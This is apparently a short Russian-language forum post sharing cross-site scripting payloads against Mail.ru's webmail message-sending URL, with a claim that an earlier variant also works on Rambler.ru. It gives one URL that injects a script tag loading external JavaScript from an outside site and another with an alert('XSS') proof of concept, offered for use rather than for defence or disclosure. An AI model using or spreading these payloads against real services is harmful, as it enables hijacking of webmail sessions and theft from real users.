выше приведённый мной вариант срабатывает и на Рамблер.ру
ещё нашёл вариант : http://win.mail.ru/cgi-bin/sendmsg?plainmode=1&Body="><SCRIPT SRC=http://devarsiv.org/alex/j.js></SCRIPT>
но ругается на потенциальный опасный код в письме ,тoесть в прикреплённом хтмл файле
вот сам ксс на майле.ру :win.mail.ru/cgi-bin/sendmsg?plainmode=1&Body=<script>alert('XSS')</script>